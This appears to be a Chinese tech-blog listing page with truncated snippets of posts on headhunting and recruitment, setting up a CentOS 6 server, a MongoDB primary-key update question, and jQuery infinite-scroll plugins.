    关于人才 每个月我都会接到许多猎头的电话,有些猎头比较专业,但绝大多数在我看来与猎头二字还是有很大差距的。 与猎头接触多了,自然也了解了他们的工作,包括操作手法,总体上国内的猎头行业还处在初级阶段。 总结就是“盲目推荐,以量取胜”。 目前现状 许多从事人力资源工作的人,根本不懂得怎么找人才。处在人才找不到企业,企业找不到人才的尴尬处境。 企业招聘,通常是需要用人的部门提出招聘条件,由人
  • 搭建 CentOS 6 服务器 - 目录 rensanning centos
    (1) 安装CentOS ISO(desktop/minimal)、Cloud(AWS/阿里云)、Virtualization(VMWare、VirtualBox) 详细内容 (2) Linux常用命令 cd、ls、rm、chmod...... 详细内容 (3) 初始环境设置 用户管理、网络设置、安全设置...... 详细内容 (4) 常驻服务Daemon
  • 【求助】mongoDB无法更新主键 toknowme mongodb
      Query query = new Query();          query.addCriteria(new Criteria("_id").is(o.getId()));                &n
  • jquery 页面滚动到底部自动加载插件集合 xp9802 jquery
    很多社交网站都使用无限滚动的翻页技术来提高用户体验,当你页面滑到列表底部时候无需点击就自动加载更多的内容。下面为你推荐 10 个 jQuery 的无限滚动的插件: 1. jQuery ScrollPagination jQuery ScrollPagination plugin 是一个 jQuery 实现的支持无限滚动加载数据的插件。 2. jQuery Screw S
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他